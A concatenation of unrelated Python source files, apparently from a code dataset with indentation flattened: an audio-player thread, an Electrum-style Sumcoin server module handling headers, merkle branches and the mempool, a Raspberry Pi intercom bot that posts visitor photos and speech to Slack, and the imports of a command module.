self._resumed.set() # we are not paused
self._current_error: Optional[Exception] = None
self._connected: threading.Event = client._connected
self._lock: threading.Lock = threading.Lock()
if after is not None and not callable(after):
raise TypeError('Expected a callable for the "after" parameter.')
def _do_run(self) -> None:
self.loops = 0
self._start = time.perf_counter()
# getattr lookup speed ups
play_audio = self.client.send_audio_packet
self._speak(True)
while not self._end.is_set():
# are we paused?
if not self._resumed.is_set():
# wait until we aren't
self._resumed.wait()
continue
# are we disconnected from voice?
if not self._connected.is_set():
# wait until we are connected
self._connected.wait()
# reset our internal data
self.loops = 0
self._start = time.perf_counter()
self.loops += 1
data = self.source.read()
if not data:
self.stop()
break
play_audio(data, encode=not self.source.is_opus())
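            # pace the stream: work out when the next frame is due relative to
            # _start and sleep the remaining time, clamped at 0 if we fell behind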
next_time = self._start + self.DELAY * self.loops
delay = max(0, self.DELAY + (next_time - time.perf_counter()))
time.sleep(delay)
def run(self) -> None:
try:
self._do_run()
except Exception as exc:
self._current_error = exc
self.stop()
finally:
self.source.cleanup()
self._call_after()
def _call_after(self) -> None:
error = self._current_error
if self.after is not None:
try:
self.after(error)
except Exception as exc:
_log.exception("Calling the after function failed.")
exc.__context__ = error
traceback.print_exception(type(exc), exc, exc.__traceback__)
elif error:
msg = f"Exception in voice thread {self.name}"
_log.exception(msg, exc_info=error)
print(msg, file=sys.stderr)
traceback.print_exception(type(error), error, error.__traceback__)
def stop(self) -> None:
self._end.set()
self._resumed.set()
self._speak(False)
def pause(self, *, update_speaking: bool = True) -> None:
self._resumed.clear()
if update_speaking:
self._speak(False)
def resume(self, *, update_speaking: bool = True) -> None:
self.loops = 0
self._start = time.perf_counter()
self._resumed.set()
if update_speaking:
self._speak(True)
def is_playing(self) -> bool:
return self._resumed.is_set() and not self._end.is_set()
def is_paused(self) -> bool:
return not self._end.is_set() and not self._resumed.is_set()
def _set_source(self, source: AudioSource) -> None:
with self._lock:
self.pause(update_speaking=False)
self.source = source
self.resume(update_speaking=False)
def _speak(self, speaking: bool) -> None:
try:
asyncio.run_coroutine_threadsafe(self.client.ws.speak(speaking), self.client.loop)
except Exception as e:
_log.info("Speaking call in player failed: %s", e)
|
blockchain_processor.py
|
#!/usr/bin/env python
# Copyright(C) 2011-2016 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import hashlib
from json import dumps, load
import os
from Queue import Queue
import random
import sys
import time
import threading
import urllib
import deserialize
from processor import Processor, print_log
from storage import Storage
from utils import logger, hash_decode, hash_encode, Hash, header_from_string, header_to_string, ProfiledThread, \
rev_hex, int_to_hex4
class BlockchainProcessor(Processor):
def __init__(self, config, shared):
Processor.__init__(self)
# monitoring
self.avg_time = 0,0,0
self.time_ref = time.time()
self.shared = shared
self.config = config
self.up_to_date = False
self.watch_lock = threading.Lock()
self.watch_blocks = []
self.watch_headers = []
self.watched_addresses = {}
self.history_cache = {}
self.merkle_cache = {}
self.max_cache_size = 100000
self.chunk_cache = {}
self.cache_lock = threading.Lock()
self.headers_data = ''
self.headers_path = config.get('leveldb', 'path')
self.mempool_fees = {}
self.mempool_values = {}
self.mempool_addresses = {}
        self.mempool_hist = {}  # addr -> list of (txid, delta)
self.mempool_unconfirmed = {} # txid -> set of unconfirmed inputs
self.mempool_hashes = set()
self.mempool_lock = threading.Lock()
self.address_queue = Queue()
try:
self.test_reorgs = config.getboolean('leveldb', 'test_reorgs') # simulate random blockchain reorgs
except:
self.test_reorgs = False
self.storage = Storage(config, shared, self.test_reorgs)
self.bitcoind_url = 'http://%s:%s@%s:%s/' % (
config.get('bitcoind', 'bitcoind_user'),
config.get('bitcoind', 'bitcoind_password'),
config.get('bitcoind', 'bitcoind_host'),
config.get('bitcoind', 'bitcoind_port'))
self.sent_height = 0
self.sent_header = None
# catch_up headers
self.init_headers(self.storage.height)
# start catch_up thread
if config.getboolean('leveldb', 'profiler'):
filename = os.path.join(config.get('leveldb', 'path'), 'profile')
print_log('profiled thread', filename)
self.blockchain_thread = ProfiledThread(filename, target = self.do_catch_up)
else:
self.blockchain_thread = threading.Thread(target = self.do_catch_up)
self.blockchain_thread.start()
def do_catch_up(self):
self.header = self.block2header(self.bitcoind('getblock', (self.storage.last_hash,)))
self.header['utxo_root'] = self.storage.get_root_hash().encode('hex')
self.catch_up(sync=False)
if not self.shared.stopped():
print_log("Blockchain is up to date.")
self.memorypool_update()
print_log("Memory pool initialized.")
while not self.shared.stopped():
self.main_iteration()
if self.shared.paused():
print_log("sumcoind is responding")
self.shared.unpause()
time.sleep(10)
def set_time(self):
self.time_ref = time.time()
def print_time(self, num_tx):
delta = time.time() - self.time_ref
# leaky averages
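        # alpha = (1 + 0.01*n)/(n + 1) starts at 1 and decays toward 0.01, so
        # the first samples dominate early on and later blocks are smoothed
        # over roughly the last hundred measurements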
seconds_per_block, tx_per_second, n = self.avg_time
alpha = (1. + 0.01 * n)/(n+1)
seconds_per_block = (1-alpha) * seconds_per_block + alpha * delta
alpha2 = alpha * delta / seconds_per_block
tx_per_second = (1-alpha2) * tx_per_second + alpha2 * num_tx / delta
self.avg_time = seconds_per_block, tx_per_second, n+1
if self.storage.height%100 == 0 \
or (self.storage.height%10 == 0 and self.storage.height >= 300000)\
or self.storage.height >= 1000000:
msg = "block %d (%d %.2fs) %s" %(self.storage.height, num_tx, delta, self.storage.get_root_hash().encode('hex'))
msg += " (%.2ftx/s, %.2fs/block)" % (tx_per_second, seconds_per_block)
run_blocks = self.storage.height - self.start_catchup_height
remaining_blocks = self.bitcoind_height - self.storage.height
if run_blocks>0 and remaining_blocks>0:
remaining_minutes = remaining_blocks * seconds_per_block / 60
new_blocks = int(remaining_minutes / 10) # number of new blocks expected during catchup
blocks_to_process = remaining_blocks + new_blocks
minutes = blocks_to_process * seconds_per_block / 60
rt = "%.0fmin"%minutes if minutes < 300 else "%.1f hours"%(minutes/60)
msg += " (eta %s, %d blocks)" % (rt, remaining_blocks)
print_log(msg)
def wait_on_bitcoind(self):
self.shared.pause()
time.sleep(10)
if self.shared.stopped():
# this will end the thread
raise BaseException()
def bitcoind(self, method, params=()):
postdata = dumps({"method": method, 'params': params, 'id': 'jsonrpc'})
while True:
try:
response = urllib.urlopen(self.bitcoind_url, postdata)
r = load(response)
response.close()
except:
print_log("cannot reach sumcoind...")
self.wait_on_bitcoind()
else:
if r['error'] is not None:
if r['error'].get('code') == -28:
print_log("sumcoind still warming up...")
self.wait_on_bitcoind()
continue
raise BaseException(r['error'])
break
return r.get('result')
@staticmethod
def block2header(b):
return {
"block_height": b.get('height'),
"version": b.get('version'),
"prev_block_hash": b.get('previousblockhash'),
"merkle_root": b.get('merkleroot'),
"timestamp": b.get('time'),
"bits": int(b.get('bits'), 16),
"nonce": b.get('nonce'),
}
def get_header(self, height):
block_hash = self.bitcoind('getblockhash', (height,))
b = self.bitcoind('getblock', (block_hash,))
return self.block2header(b)
def init_headers(self, db_height):
self.headers_filename = os.path.join(self.headers_path, 'blockchain_headers')
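        # blockchain_headers is a flat file of raw 80-byte block headers
        # appended in height order, so header N lives at byte offset N*80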
if os.path.exists(self.headers_filename):
height = os.path.getsize(self.headers_filename)/80 - 1 # the current height
if height > 0:
prev_hash = self.hash_header(self.read_header(height))
else:
prev_hash = None
else:
open(self.headers_filename, 'wb').close()
prev_hash = None
height = -1
if height < db_height:
print_log("catching up missing headers:", height, db_height)
try:
while height < db_height:
height += 1
header = self.get_header(height)
if height > 1:
if prev_hash != header.get('prev_block_hash'):
# The prev_hash block is orphaned, go back
print_log("reorganizing, a block in file is orphaned:", prev_hash)
# Go to the parent of the orphaned block
height -= 2
prev_hash = self.hash_header(self.read_header(height))
continue
self.write_header(header, sync=False)
prev_hash = self.hash_header(header)
if (height % 1000) == 0:
print_log("headers file:", height)
except KeyboardInterrupt:
self.flush_headers()
sys.exit()
self.flush_headers()
@staticmethod
def hash_header(header):
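        # header_to_string() serializes the header to the canonical 80-byte layout
        # (the same 80-byte records the headers file below is indexed by); Hash()
        # here is the double-SHA256 helper, and reversing the byte order gives the
        # block hash in the big-endian hex form bitcoind displays.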
return rev_hex(Hash(header_to_string(header).decode('hex')).encode('hex'))
def read_header(self, block_height):
if os.path.exists(self.headers_filename):
with open(self.headers_filename, 'rb') as f:
f.seek(block_height * 80)
h = f.read(80)
if len(h) == 80:
h = header_from_string(h)
return h
def read_chunk(self, index):
with open(self.headers_filename, 'rb') as f:
            f.seek(index*2016*80)  # 2016 headers per chunk: one difficulty retarget period, the unit Electrum clients request headers in
chunk = f.read(2016*80)
return chunk.encode('hex')
def write_header(self, header, sync=True):
if not self.headers_data:
self.headers_offset = header.get('block_height')
self.headers_data += header_to_string(header).decode('hex')
if sync or len(self.headers_data) > 40*100:
self.flush_headers()
with self.cache_lock:
chunk_index = header.get('block_height')/2016
if chunk_index in self.chunk_cache:
del self.chunk_cache[chunk_index]
def pop_header(self):
# we need to do this only if we have not flushed
if self.headers_data:
            self.headers_data = self.headers_data[:-80]  # drop the last header (each serialized header is 80 bytes)
def flush_headers(self):
if not self.headers_data:
return
with open(self.headers_filename, 'rb+') as f:
f.seek(self.headers_offset*80)
f.write(self.headers_data)
self.headers_data = ''
def get_chunk(self, i):
        # chunks are read from the headers file on disk; keep recently served chunks in an in-memory cache
with self.cache_lock:
chunk = self.chunk_cache.get(i)
if not chunk:
chunk = self.read_chunk(i)
if chunk:
self.chunk_cache[i] = chunk
return chunk
def get_mempool_transaction(self, txid):
try:
raw_tx = self.bitcoind('getrawtransaction', (txid, 0))
except:
return None
vds = deserialize.BCDataStream()
vds.write(raw_tx.decode('hex'))
try:
return deserialize.parse_Transaction(vds, is_coinbase=False)
except:
print_log("ERROR: cannot parse", txid)
return None
def get_unconfirmed_history(self, addr):
hist = []
with self.mempool_lock:
for tx_hash, delta in self.mempool_hist.get(addr, ()):
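                # Electrum protocol convention: height 0 means the transaction is in
                # the mempool with all inputs confirmed, height -1 means it spends
                # outputs that are themselves still unconfirmed.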
height = -1 if self.mempool_unconfirmed.get(tx_hash) else 0
fee = self.mempool_fees.get(tx_hash)
hist.append({'tx_hash':tx_hash, 'height':height, 'fee':fee})
return hist
def get_history(self, addr, cache_only=False):
with self.cache_lock:
hist = self.history_cache.get(addr)
if hist is not None:
return hist
if cache_only:
return -1
hist = self.storage.get_history(addr)
hist.extend(self.get_unconfirmed_history(addr))
with self.cache_lock:
if len(self.history_cache) > self.max_cache_size:
logger.info("clearing cache")
self.history_cache.clear()
self.history_cache[addr] = hist
return hist
def get_unconfirmed_value(self, addr):
v = 0
with self.mempool_lock:
for txid, delta in self.mempool_hist.get(addr, ()):
v += delta
return v
def get_status(self, addr, cache_only=False):
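        # An address "status" in the Electrum protocol is the sha256 digest of the
        # concatenation of "txid:height:" over the address history, e.g.
        # "<txid1>:100000:<txid2>:0:"; clients compare it against their cached
        # digest to decide whether they need to re-download the history.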
tx_points = self.get_history(addr, cache_only)
if cache_only and tx_points == -1:
return -1
if not tx_points:
return None
if tx_points == ['*']:
return '*'
status = ''.join(tx.get('tx_hash') + ':%d:' % tx.get('height') for tx in tx_points)
return hashlib.sha256(status).digest().encode('hex')
def get_merkle(self, tx_hash, height, cache_only):
with self.cache_lock:
out = self.merkle_cache.get(tx_hash)
if out is not None:
return out
if cache_only:
return -1
block_hash = self.bitcoind('getblockhash', (height,))
b = self.bitcoind('getblock', (block_hash,))
tx_list = b.get('tx')
tx_pos = tx_list.index(tx_hash)
merkle = map(hash_decode, tx_list)
target_hash = hash_decode(tx_hash)
s = []
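        # Build the merkle branch for target_hash: at each level pair the hashes
        # (duplicating the last one when the count is odd), record the sibling of
        # the pair that contains our transaction, and move up until a single root
        # remains.  `s` then holds one sibling per level, which is exactly what a
        # client needs to verify inclusion against the block's merkle_root.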
while len(merkle) != 1:
if len(merkle) % 2:
merkle.append(merkle[-1])
n = []
while merkle:
new_hash = Hash(merkle[0] + merkle[1])
if merkle[0] == target_hash:
s.append(hash_encode(merkle[1]))
target_hash = new_hash
elif merkle[1] == target_hash:
s.append(hash_encode(merkle[0]))
target_hash = new_hash
n.append(new_hash)
merkle = merkle[2:]
merkle = n
out = {"block_height": height, "merkle": s, "pos": tx_pos}
with self.cache_lock:
if len(self.merkle_cache) > self.max_cache_size:
logger.info("clearing merkle cache")
self.merkle_cache.clear()
self.merkle_cache[tx_hash] = out
return out
@staticmethod
def deserialize_block(block):
txlist = block.get('tx')
tx_hashes = [] # ordered txids
txdict = {} # deserialized tx
is_coinbase = True
for raw_tx in txlist:
tx_hash = hash_encode(Hash(raw_tx.decode('hex')))
vds = deserialize.BCDataStream()
vds.write(raw_tx.decode('hex'))
try:
tx = deserialize.parse_Transaction(vds, is_coinbase)
except:
print_log("ERROR: cannot parse", tx_hash)
continue
tx_hashes.append(tx_hash)
txdict[tx_hash] = tx
is_coinbase = False
return tx_hashes, txdict
def import_block(self, block, block_hash, block_height, revert=False):
touched_addr = set()
# deserialize transactions
tx_hashes, txdict = self.deserialize_block(block)
        # undo info: per-transaction data needed to roll the UTXO state back during a reorg
if revert:
undo_info = self.storage.get_undo_info(block_height)
tx_hashes.reverse()
else:
undo_info = {}
for txid in tx_hashes: # must be ordered
tx = txdict[txid]
if not revert:
undo = self.storage.import_transaction(txid, tx, block_height, touched_addr)
undo_info[txid] = undo
else:
undo = undo_info.pop(txid)
self.storage.revert_transaction(txid, tx, block_height, touched_addr, undo)
if revert:
assert undo_info == {}
# add undo info
if not revert:
self.storage.write_undo_info(block_height, self.bitcoind_height, undo_info)
        # save the current tip (hash and height)
self.storage.save_height(block_hash, block_height)
for addr in touched_addr:
self.invalidate_cache(addr)
self.storage.update_hashes()
# batch write modified nodes
self.storage.batch_write()
# return length for monitoring
return len(tx_hashes)
def add_request(self, session, request):
        # see if we can get it from cache; if not, add the request to the queue
message_id = request.get('id')
try:
result = self.process(request, cache_only=True)
except BaseException as e:
self.push_response(session, {'id': message_id, 'error': str(e)})
return
if result == -1:
self.queue.put((session, request))
else:
self.push_response(session, {'id': message_id, 'result': result})
def do_subscribe(self, method, params, session):
with self.watch_lock:
if method == 'blockchain.numblocks.subscribe':
if session not in self.watch_blocks:
self.watch_blocks.append(session)
elif method == 'blockchain.headers.subscribe':
if session not in self.watch_headers:
self.watch_headers.append(session)
elif method == 'blockchain.address.subscribe':
address = params[0]
l = self.watched_addresses.get(address)
if l is None:
self.watched_addresses[address] = [session]
elif session not in l:
l.append(session)
def do_unsubscribe(self, method, params, session):
with self.watch_lock:
if method == 'blockchain.numblocks.subscribe':
if session in self.watch_blocks:
self.watch_blocks.remove(session)
elif method == 'blockchain.headers.subscribe':
if session in self.watch_headers:
self.watch_headers.remove(session)
elif method == "blockchain.address.subscribe":
addr = params[0]
l = self.watched_addresses.get(addr)
if not l:
return
if session in l:
l.remove(session)
if session in l:
print_log("error rc!!")
self.shared.stop()
if l == []:
del self.watched_addresses[addr]
def process(self, request, cache_only=False):
message_id = request['id']
method = request['method']
params = request.get('params', ())
result = None
error = None
if method == 'blockchain.numblocks.subscribe':
result = self.storage.height
elif method == 'blockchain.headers.subscribe':
result = self.header
elif method == 'blockchain.address.subscribe':
address = str(params[0])
result = self.get_status(address, cache_only)
elif method == 'blockchain.address.get_history':
address = str(params[0])
result = self.get_history(address, cache_only)
elif method == 'blockchain.address.get_mempool':
address = str(params[0])
result = self.get_unconfirmed_history(address)
elif method == 'blockchain.address.get_balance':
address = str(params[0])
confirmed = self.storage.get_balance(address)
unconfirmed = self.get_unconfirmed_value(address)
result = { 'confirmed':confirmed, 'unconfirmed':unconfirmed }
elif method == 'blockchain.address.get_proof':
address = str(params[0])
result = self.storage.get_proof(address)
elif method == 'blockchain.address.listunspent':
address = str(params[0])
result = self.storage.listunspent(address)
elif method == 'blockchain.utxo.get_address':
txid = str(params[0])
pos = int(params[1])
txi = (txid + int_to_hex4(pos)).decode('hex')
result = self.storage.get_address(txi)
elif method == 'blockchain.block.get_header':
if cache_only:
result = -1
else:
height = int(params[0])
result = self.get_header(height)
elif method == 'blockchain.block.get_chunk':
if cache_only:
result = -1
else:
index = int(params[0])
result = self.get_chunk(index)
elif method == 'blockchain.transaction.broadcast':
try:
txo = self.bitcoind('sendrawtransaction', params)
print_log("sent tx:", txo)
result = txo
            except BaseException as e:
error = e.args[0]
if error["code"] == -26:
# If we return anything that's not the transaction hash,
# it's considered an error message
message = error["message"]
if "non-mandatory-script-verify-flag" in message:
result = "Your client produced a transaction that is not accepted by the Sumcoin network any more. Please upgrade to Electrum 2.5.1 or newer\n"
else:
result = "The transaction was rejected by network rules.(" + message + ")\n" \
"[" + params[0] + "]"
else:
result = error["message"] # do send an error
print_log("error:", result)
elif method == 'blockchain.transaction.get_merkle':
tx_hash = params[0]
tx_height = params[1]
result = self.get_merkle(tx_hash, tx_height, cache_only)
elif method == 'blockchain.transaction.get':
tx_hash = params[0]
result = self.bitcoind('getrawtransaction', (tx_hash, 0))
elif method == 'blockchain.estimatefee':
num = int(params[0])
result = self.bitcoind('estimatefee', (num,))
elif method == 'blockchain.relayfee':
result = self.relayfee
else:
raise BaseException("unknown method:%s" % method)
return result
def get_block(self, block_hash):
block = self.bitcoind('getblock', (block_hash,))
rawtxreq = []
i = 0
for txid in block['tx']:
rawtxreq.append({
"method": "getrawtransaction",
"params": (txid,),
"id": i,
})
i += 1
postdata = dumps(rawtxreq)
while True:
try:
response = urllib.urlopen(self.bitcoind_url, postdata)
r = load(response)
response.close()
except:
logger.error("sumcoind error (getfullblock)")
self.wait_on_bitcoind()
continue
try:
rawtxdata = []
for ir in r:
assert ir['error'] is None, "Error: make sure you run sumcoind with txindex=1; use -reindex if needed."
rawtxdata.append(ir['result'])
except BaseException as e:
logger.error(str(e))
self.wait_on_bitcoind()
continue
block['tx'] = rawtxdata
return block
def catch_up(self, sync=True):
self.start_catchup_height = self.storage.height
prev_root_hash = None
n = 0
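        # Follow sumcoind one block at a time: if the next block extends our tip,
        # import it; otherwise our tip has been orphaned, so revert the last block
        # using its stored undo info and retry.  test_reorgs occasionally forces a
        # revert just to exercise that path.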
while not self.shared.stopped():
# are we done yet?
info = self.bitcoind('getinfo')
self.relayfee = info.get('relayfee')
self.bitcoind_height = info.get('blocks')
bitcoind_block_hash = self.bitcoind('getblockhash', (self.bitcoind_height,))
if self.storage.last_hash == bitcoind_block_hash:
self.up_to_date = True
break
self.set_time()
revert = (random.randint(1, 100) == 1) if self.test_reorgs and self.storage.height>100 else False
# not done..
self.up_to_date = False
try:
next_block_hash = self.bitcoind('getblockhash', (self.storage.height + 1,))
            except BaseException as e:
revert = True
next_block = self.get_block(next_block_hash if not revert else self.storage.last_hash)
if (next_block.get('previousblockhash') == self.storage.last_hash) and not revert:
prev_root_hash = self.storage.get_root_hash()
n = self.import_block(next_block, next_block_hash, self.storage.height+1)
self.storage.height = self.storage.height + 1
self.write_header(self.block2header(next_block), sync)
self.storage.last_hash = next_block_hash
else:
# revert current block
block = self.get_block(self.storage.last_hash)
print_log("blockchain reorg", self.storage.height, block.get('previousblockhash'), self.storage.last_hash)
n = self.import_block(block, self.storage.last_hash, self.storage.height, revert=True)
self.pop_header()
self.flush_headers()
self.storage.height -= 1
# read previous header from disk
self.header = self.read_header(self.storage.height)
self.storage.last_hash = self.hash_header(self.header)
if prev_root_hash:
assert prev_root_hash == self.storage.get_root_hash()
prev_root_hash = None
# print time
self.print_time(n)
self.header = self.block2header(self.bitcoind('getblock', (self.storage.last_hash,)))
self.header['utxo_root'] = self.storage.get_root_hash().encode('hex')
if self.shared.stopped():
print_log( "closing database" )
self.storage.close()
def memorypool_update(self):
t0 = time.time()
mempool_hashes = set(self.bitcoind('getrawmempool'))
touched_addresses = set()
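        # Two-pass mempool scan: the first pass over new transactions records output
        # values per address (and a provisional fee of -sum(outputs)); the second
        # pass resolves each input against either another mempool transaction or the
        # confirmed UTXO set, subtracting input values from the affected addresses
        # and adding them to the fee, so mempool_fees[tx] ends up as inputs - outputs.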
# get new transactions
new_tx = {}
for tx_hash in mempool_hashes:
if tx_hash in self.mempool_hashes:
continue
tx = self.get_mempool_transaction(tx_hash)
if not tx:
continue
new_tx[tx_hash] = tx
# remove older entries from mempool_hashes
self.mempool_hashes = mempool_hashes
# check all tx outputs
for tx_hash, tx in new_tx.iteritems():
mpa = self.mempool_addresses.get(tx_hash, {})
out_values = []
out_sum = 0
for x in tx.get('outputs'):
addr = x.get('address', '')
value = x['value']
out_values.append((addr, value))
if not addr:
continue
v = mpa.get(addr, 0)
v += value
mpa[addr] = v
touched_addresses.add(addr)
out_sum += value
self.mempool_fees[tx_hash] = -out_sum
self.mempool_addresses[tx_hash] = mpa
self.mempool_values[tx_hash] = out_values
self.mempool_unconfirmed[tx_hash] = set()
# check all inputs
for tx_hash, tx in new_tx.iteritems():
mpa = self.mempool_addresses.get(tx_hash, {})
# are we spending unconfirmed inputs?
input_sum = 0
for x in tx.get('inputs'):
prev_hash = x.get('prevout_hash')
prev_n = x.get('prevout_n')
mpv = self.mempool_values.get(prev_hash)
if mpv:
addr, value = mpv[prev_n]
self.mempool_unconfirmed[tx_hash].add(prev_hash)
else:
txi = (prev_hash + int_to_hex4(prev_n)).decode('hex')
try:
addr = self.storage.get_address(txi)
value = self.storage.get_utxo_value(addr,txi)
except:
print_log("utxo not in database; postponing mempool update")
return
# we can proceed
input_sum += value
if not addr:
continue
v = mpa.get(addr, 0)
v -= value
mpa[addr] = v
touched_addresses.add(addr)
self.mempool_addresses[tx_hash] = mpa
self.mempool_fees[tx_hash] += input_sum
# remove deprecated entries from mempool_addresses
for tx_hash, addresses in self.mempool_addresses.items():
if tx_hash not in self.mempool_hashes:
del self.mempool_addresses[tx_hash]
del self.mempool_values[tx_hash]
del self.mempool_unconfirmed[tx_hash]
del self.mempool_fees[tx_hash]
touched_addresses.update(addresses)
# remove deprecated entries from mempool_hist
new_mempool_hist = {}
for addr in self.mempool_hist.iterkeys():
h = self.mempool_hist[addr]
hh = []
for tx_hash, delta in h:
if tx_hash in self.mempool_addresses:
hh.append((tx_hash, delta))
if hh:
new_mempool_hist[addr] = hh
# add new transactions to mempool_hist
for tx_hash in new_tx.iterkeys():
addresses = self.mempool_addresses[tx_hash]
for addr, delta in addresses.iteritems():
h = new_mempool_hist.get(addr, [])
if (tx_hash, delta) not in h:
h.append((tx_hash, delta))
new_mempool_hist[addr] = h
with self.mempool_lock:
self.mempool_hist = new_mempool_hist
# invalidate cache for touched addresses
for addr in touched_addresses:
self.invalidate_cache(addr)
t1 = time.time()
if t1-t0>1:
print_log('mempool_update', t1-t0, len(self.mempool_hashes), len(self.mempool_hist))
def invalidate_cache(self, address):
with self.cache_lock:
if address in self.history_cache:
# print_log("cache: invalidating", address)
del self.history_cache[address]
with self.watch_lock:
sessions = self.watched_addresses.get(address)
if sessions:
# TODO: update cache here. if new value equals cached value, do not send notification
self.address_queue.put((address,sessions))
def close(self):
self.blockchain_thread.join()
print_log("Closing database...")
self.storage.close()
print_log("Database is closed")
def main_iteration(self):
if self.shared.stopped():
print_log("Stopping timer")
return
self.catch_up()
self.memorypool_update()
if self.sent_height != self.storage.height:
self.sent_height = self.storage.height
for session in self.watch_blocks:
self.push_response(session, {
'id': None,
'method': 'blockchain.numblocks.subscribe',
'params': (self.storage.height,),
})
if self.sent_header != self.header:
self.sent_header = self.header
for session in self.watch_headers:
self.push_response(session, {
'id': None,
'method': 'blockchain.headers.subscribe',
'params': (self.header,),
})
while True:
try:
addr, sessions = self.address_queue.get(False)
except:
break
status = self.get_status(addr)
for session in sessions:
self.push_response(session, {
'id': None,
'method': 'blockchain.address.subscribe',
'params': (addr, status),
})
|
intercom-kun.py
|
#!/usr/bin/env python3
import cv2
import numpy as np
import mod.snowboydecoder as snowboydecoder
import sys
import os
import subprocess
import uuid
import logging
import threading
import requests
import json
import aiy.audio
import aiy.cloudspeech
import aiy.voicehat
import aiy.i18n
import mod.detect_intent_texts as detect_intent_texts
#Slack token and channel
TOKEN = 'put your Slack API token here'
CHANNEL = 'put the Slack channel to post to here'
# set log
logging.basicConfig(
level=logging.INFO,
format="[%(asctime)s] %(levelname)s:%(name)s:%(message)s"
)
#set voice detect
#pass a snowboy model trained on your intercom chime (used like a hotword) as the argument
if len(sys.argv) == 1:
print("Error: need to specify model name")
print("Usage: python demo.py your.model")
sys.exit(-1)
model = sys.argv[1]
#lang code and uuid
aiy.i18n.set_language_code('ja-JP')
myuuid = str(uuid.uuid4())
def detect_motion(cap):
avg = None
while(cap.isOpened()):
ret, frame = cap.read()
        frame = cv2.flip(frame, -1)  # flip the camera image both vertically and horizontally
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
if avg is None:
avg = gray.copy().astype('float')
continue
        # frame difference against a weighted running average of past frames
cv2.accumulateWeighted(gray, avg, 0.5)
frameDelta = cv2.absdiff(gray, cv2.convertScaleAbs(avg))
thresh = cv2.threshold(frameDelta, 3, 255, cv2.THRESH_BINARY)[1]
contours = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)[1]
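        # Motion detection by background subtraction: keep a weighted running average
        # of past frames (accumulateWeighted), diff the current frame against it,
        # binarize the delta and inspect contour areas.  The 1000..10000 px area
        # window below is presumably tuned for this camera to ignore both sensor
        # noise and whole-frame lighting changes.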
max_area = 0
for cnt in contours:
area = cv2.contourArea(cnt)
if max_area < area and area < 10000 and area > 1000:
max_area = area
if max_area > 1000:
#print('hit motion')
break
else:
cap.release()
#sys.exit(1)
def text_to_slack(text):
#post to slack
param = {
'token':TOKEN,
'channel':CHANNEL,
'text':text,
'as_user':'true'
}
requests.post(url="https://slack.com/api/chat.postMessage",params=param)
def cap_to_slack(cap, text):
ret, frame = cap.read()
    frame = cv2.flip(frame, -1)  # flip the camera image both vertically and horizontally
    # brightness normalization for dark scenes (disabled)
#frame = (frame - np.mean(frame))/np.std(frame)*16+96
path = "photo.jpg"
cv2.imwrite(path,frame)
#post to slack
files = {'file': open("photo.jpg", 'rb')}
param = {
'token':TOKEN,
'channels':CHANNEL,
#'filename':"filename",
'initial_comment':text,
#'title': "title"
}
requests.post(url="https://slack.com/api/files.upload",params=param, files=files)
os.remove('photo.jpg')
def play_voice(voice_name):
voice_path = os.path.join(os.path.dirname(__file__), 'voice', voice_name) + '.wav'
print(voice_path, 'find...')
if os.path.exists(voice_path) == True:
print('voice', voice_path, 'found!')
print('voice play start!')
aiy.audio.play_wave(voice_path)
print('voice play end!')
def main():
recognizer = aiy.cloudspeech.get_recognizer()
detector = snowboydecoder.HotwordDetector(model, sensitivity=0.5)
button = aiy.voicehat.get_button()
led = aiy.voicehat.get_led()
player=aiy.audio.get_player()
text_recognizer = detect_intent_texts.get_recognizer()
aiy.audio.get_recorder().start()
text_to_slack(":robot_face: イン君 : こんにちは。私は自動応答機械、中国語の部屋の中の英国人。 \n インターホン君。略してイン君といいます。只今よりあなたの代わりに受付しますね。")
text_to_slack(":robot_face: イン君 : 私のソースコードはこちらです。 https://github.com/senyoltw/intercom-kun")
while(True):
cap = cv2.VideoCapture(0)
cap.set(3,640) # set Width
cap.set(4,480) # set Height
print('detect motion')
detect_motion_thread = threading.Thread(target=detect_motion, args=(cap,))
detect_motion_thread.start()
print('detect hotword')
detect_audio_thread = threading.Thread(target=detector.start)
detect_audio_thread.start()
detect_motion_thread.join()
detect_audio_thread.join()
print('hit! motion and hotword!')
text_to_slack(":robot_face: イン君 : あれ、誰か来たみたいです。")
print('cap 2 slack')
        cap_to_slack_thread = threading.Thread(target=cap_to_slack, args=(cap, ":robot_face: イン君 : 玄関の写真です",))
        cap_to_slack_thread.start()
to_the_end = False
while to_the_end == False:
print('Listening...')
text = recognizer.recognize()
            # watch for motion during the conversation; if none is detected, assume the visitor has left
detect_motion_thread = threading.Thread(target=detect_motion, args=(cap,))
detect_motion_thread.start()
if not text:
print('Sorry, I did not hear you.')
else:
print('text 2 slack')
slack_text = ':dog2: 来客者 : ' + text
text_to_slack(slack_text)
print('You said "', text, '"')
answer = text_recognizer.recognize(myuuid, text)
print('Dialogflow Intents:"', answer.query_result.intent.display_name, '"')
print('Dialogflow result :"', answer.query_result.fulfillment_text, '"')
print('text 2 slack')
slack_text = ':robot_face: イン君 : ' + answer.query_result.fulfillment_text
text_to_slack(slack_text)
play_voice(answer.query_result.fulfillment_text)
to_the_end = answer.query_result.all_required_params_present
if to_the_end == False:
continue
detect_motion_thread.join(timeout=5)
if detect_motion_thread.is_alive() == False:
to_the_end = False
else:
to_the_end = True
print('The ENDってね')
text_to_slack(":robot_face: イン君 : いなくなりました。会話を終了します。")
cap.release()
if __name__ == '__main__':
main()
|
command.py
|
# Copyright (c) 2016-present, Facebook, Inc.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import argparse
import enum
import json
import logging
import os
import re
import resource
import signal
import subprocess
import threading
